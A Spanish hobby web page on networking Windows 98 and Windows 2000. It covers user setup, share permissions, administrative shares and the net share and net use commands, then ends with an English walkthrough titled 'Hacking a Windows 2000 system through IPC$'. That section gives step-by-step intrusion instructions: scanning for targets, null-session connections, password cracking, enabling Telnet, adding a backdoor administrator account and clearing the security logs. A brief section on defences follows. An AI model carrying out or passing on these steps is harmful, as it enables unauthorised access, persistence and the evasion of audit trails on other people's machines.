Zurdo Soft es:
Jorge E. Ferreyra
Periodistas Argentinos 234 - (5900)Villa María
Tel.: 0353 453 8034 - 0353 155 66 7350
Córdoba - Argentina

Red entre Win2000 y Win98

Cuando trata de acceder a un disco de red o impresora compartida en una computadora con Windows 2000/XP desde una con  Windows 95/98/ME puede recibir un dialogo IPC$ como la de arriba. Si le pasa esto, necesita configurar la seguridad en su Windows 2000/XP.
Cuando Windows 95/98/ME trata de explorar un Windows 2000/XP, primero debe identificarse. El nombre de usuario de Windows es el nombre en el que esta identificado en la red Microsoft. Cuando inicia 98/95/ME recibe una ventana como esta:

Debe crear entonces ese nombre en la seguridad de Windows 2000/XP para permitir al usuario acceder a los recursos compartidos en Windows 2000/XP.
 

Creando en Windows 2000
Desde el Panel de Control, doble click en herramientas adminstrativas. Luego, click en administracion de equipos. Esto lanzara una ventana como la de abajo. Desde aqui, abra Usuarios locales y Grupos y agregue un nuevo usuario.
 

Cree un usuario como el de Windows 98/98/ME. Sugiero asignar contraseña a este ID. He tenido algunos problemas usando claves en blanco. Deberia tambien destildar  'El usuario debe cambiar la contraseña' y tildar 'la contraseña no expira'.
 

This ID will default into the USERS group. This should be enough security to access files and print shares.

Now, the next time you see that IPC$ / Enter network password thing, you can use the password speficied in the user profile you just created!
 

Compartición de recursos entre sistemas Windows 2000

Cuando un sistema Windows 2000 participa en una red (grupo de trabajo o dominio), puede compartir sus recursos con el resto de ordenadores. En este contexto, sólo vamos a considerar como recursos a compartir las carpetas o directorios que existen en un sistema 2000. La compartición de otros recursos (tales como impresoras, por ejemplo) queda fuera del ámbito de este texto.

Permisos y derechos

Cualquier sistema Windows 2000 puede compartir carpetas, tanto si es un servidor como si es una estación de trabajo. Para poder compartir una carpeta basta con desplegar su menú contextual desde una ventana o desde el explorador de archivos, y seleccionar Compartir.... En la ventana asociada a esta opción se determina el nombre que tendrá el recurso (que no tiene por qué coincidir con el nombre de la propia carpeta), así como qué usuarios van a poder acceder al mismo. En relación con esto, existe una gran diferencia entre que el directorio resida en una partición FAT y que resida en una NTFS.

Si la carpeta reside en una partición FAT, este filtro de acceso será el único que determine los usuarios que van a poder acceder al contenido de la carpeta, puesto que no es posible determinar permisos sobre la misma o sus archivos. Es decir, el filtro sólo se establece para poder acceder al recurso. Si un usuario tiene permisos suficientes para conectarse a un recurso, tendrá acceso sobre todos los archivos y subcarpetas del recurso. Concretamente, el tipo de acceso sobre todos ellos será el que le permita el permiso sobre el recurso (Lectura, Escritura o Control Total).

Por el contrario, si la carpeta se encuentra en una partición NTFS, ésta tendrá unos permisos establecidos (así como sus subcarpetas y archivos), al margen de estar o no compartida. En este caso también es posible establecer permisos desde la ventana de Compartir..., pero entonces sólo los usuarios que puedan pasar ambos filtros podrán acceder a la carpeta compartida y a su contenido. En este caso se recomienda dejar Control Total sobre Todos en los permisos asociados al recurso (opción por defecto), y controlar quién (y cómo) puede acceder al recurso y a su contenido mediante los permisos asociados a dicha carpeta (y a sus archivos y subcarpetas).

Esta recomendación es muy útil, si tenemos en cuenta que de esta forma para cada carpeta (y archivo) del sistema no utilizamos dos grupos de permisos sino uno solo, independientemente de que la carpeta sea o no compartida. Este forma de trabajar obliga al administrador a asociar los permisos correctos a cada objeto del sistema (aunque no esté compartido), pero por otra parte se unifica la visión de la seguridad de los archivos, con lo que a la larga resulta más segura y más sencilla.

Cuando compartimos recursos a otros usuarios en la red (especialmente en un dominio) hay que tener en cuenta no sólo los permisos del recurso y su contenido, sino también los derechos del ordenador que comparte el recurso. En concreto, si un usuario ha iniciado una sesión interactiva en un ordenador Windows 2000 denominado A, y desea conectarse a un recurso de red que exporta otro Windows 2000 denominado B, además de poseer suficientes permisos (sobre el recurso, sobre el propio carpeta y sobre su contenido), tiene que tener concedido en B el derecho Acceder a este equipo desde la red. De lo contrario, dicho usuario ni siquiera podrá obtener la lista de los recursos que el ordenador A comparte.

Compartición dentro de un dominio

Cuando la compartición de recursos la realizan equipos que forman parte de un dominio Windows 2000, existen consideraciones que el administración debe conocer.

Primero, una vez se ha compartido físicamente una carpeta en la red (según el procedimiento descrito arriba), el administrador del dominio puede además publicar este recurso en el directorio. Para ello debe crear un nuevo objeto, en la unidad organizativa adecuada, de tipo Recurso compartido. A este objeto se le debe asociar un nombre simbólico y el nombre de recurso de red que representa (de la forma \\equipo\recurso). Es importante tener en cuenta que cuando se publica el recurso, no se comprueba si realmente existe o no, por lo que es responsabilidad del administrador el haberlo compartido y que su nombre coincida con el de la publicación. Una vez publicado, el recurso puede localizarse mediante búsquedas en el Directorio Activo, como el resto de objetos del mismo.

Y segundo, cuando un sistema Windows 2000 se agrega a un dominio, los siguientes recursos se comparten de forma automática y por defecto (estas comparticiones no deben modificarse ni prohibirse):

  • · letra_de_unidad$. Por cada partición existente en el sistema Windows 2000 (C:, D:, etc.) se crea un recurso compartido denominado C$, D$, etc. Los administradores del dominio, así como los operadores de copia del domino, pueden conectarse por defecto a estas unidades.
  • · ADMIN$. Es un recurso utilizado por el propio sistema durante la administración remota de un ordenador Windows 2000.
  • · IPC$. Recurso que agrupa los tubos (colas de mensajes) utilizados por los programas para comunicarse entre ellos. Se utiliza durante la administración remota de un ordenador Windows 2000, y cuando se observa los recursos que comparte.
  • · NETLOGON. Recurso que exporta un DC para proporcionar a los ordenadores miembros del dominio el servicio de validación de cuentas globales a través de la red (Net Logon service).
  • · SYSVOL. Recurso que exporta cada DC de un dominio. Contiene información del Directorio Activo (por ejemplo, de directivas de grupo) que debe replicarse en todos los DCs del dominio.
  • En relación con los nombres de estos recursos, es interesante saber que añadir el carácter "$" al final de cualquier nombre de recurso tiene un efecto específico: prohibe que dicho recurso se visualice dentro de la lista de recursos que una máquina exporta al resto. Es decir, convierte un recurso en ``invisible'' para al resto del mundo. En este caso, un usuario remoto sólo podrá conectarse al recurso si conoce su nombre de antemano (y tiene suficientes permisos, obviamente).

Mandatos Windows 2000 para compartir recursos

La compartición de recursos en Windows 2000 puede realizarse en línea de órdenes utilizando los mandatos net share y net use. La sintaxis de ambos mandatos es la siguiente:

  • Mandato net share: Crea, elimina o muestra recursos compartidos.
  • net share
  • net share recurso_compartido
  • net share recurso_compartido=unidad:ruta_de_acceso
  •         [/users:número | /unlimited] [/remark:"texto"]
  • net share recurso_compartido [/users:número | unlimited]
  •         [/remark:"texto"]
  • net share {recurso_compartido | unidad:ruta_de_acceso} /delete
  •      
  • Mandato net use: Conecta o desconecta un equipo de un recurso compartido o muestra información acerca de las conexiones del equipo. También controla las conexiones de red persistentes.
  • net use  [nombre_dispositivo]
  •         [\\nombre_equipo\recurso_compartido[\volumen]]
  •         [contraseña | *]] [/user:[nombre_dominio\]nombre_usuario]
  •         /delete] | [/persistent:{yes | no}
  • net use nombre_dispositivo [/home[contraseña | *]]
  •         [/delete:{yes | no}]
  • net use  [/persistent:{yes | no}]
  •      

Hacking a Windows 2000 system through IPC$
By Link

1: Scanning for open Win2k systems
2: Connecting to the IPC$
3: Connecting and using Computer Management.
4. Disable NTLM
5: Starting the Telnet service
6: Creating user accounts and adding them to a group
7: Covering your tracks
8: How to protect your Win2k system from this attack

-----------------------------------------------------------------------------------------------------
You need to be running a Win2k system:

Superscan version 3.00 by Foundstone (246kb). Homepage
NetBrute Scanner 1.0.0.7 (247KB). Homepage
PQWak V1.0 (24KB)
----------------------------------------------------------------------------------------------------
1: Scanning for open Win2k systems
A. Open SuperScan 2.05 (Port scanner)
B. Select a IP range
C. Check "Only scan responsive pings" and "All selected ports in list"
D. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
E. When a system with both Netbios and BlackJack is found, open NetBrute, and scan that IP to see if there is an IPC$

2: Connecting to the IPC$
A. Open a DOS window
B. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
C. If you connect to the system, it will say, " The command was completed successfully "
D. If it says, “bad username or password”, Try running PQWak.exe to crack the share name password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
E. Users usually have only one password for everything. So try the c$ share pass as the administrator password to connect to the IPC$

3: Connecting using Computer Management
A. Open Computer Management.
B. Click “Action”, then “Connect to Another Computer”
C. Type in the IP address.

4. Disable NTLM
A. Open “regedit”
B. Connect to the following registry key:
HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0—->NTLM
C. Set the value data from (2) to (1)
D. That will enable login to the telnet server without being connected to the IPC$ or a trusted domain.

5. Starting the Telnet service
A. In Computer Management, click “Services and Applications”
B. Click Services
C. Right click on the Telnet Service and open Properties.
D. Set the service to Automatic, and start the service.

6: Creating user accounts and adding them to a group
A. Open a dos window, and type the following: telnet IPaddress
B. If prompted to type a username and password, type Administrator with no password.
C. To create a user account, type the following: Net user username password /add
D. Replace “Username” and “password” with whatever you like.
E. To add a user account to a domain, type the following: Net localgroup administrators username /add Or Net group administrators username /add

7: Covering your tracks
A. Open a dos window, and type the following: Net use \\ipaddress\ipc$ /delete
B. While logged on to Computer Management. Check if the Security Logs are being audited in Event Viewer. If they are, clear them. :-)

8: How to protect your Win2k system from this attack
A. Open Regedit
B. Connect to the following:
C. HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
D. Change the "Value Data" from 0 to 1. It should say 0x00000001(1)
E. That will disable remote logon to a null IPC$
F. Always have a complicated administrator password with Windows2000 or any other OS
G. Install a firewall. www.zonealarm.com

Inicio [Internet] [Electrónica] [Programacion]

www.000webhost.com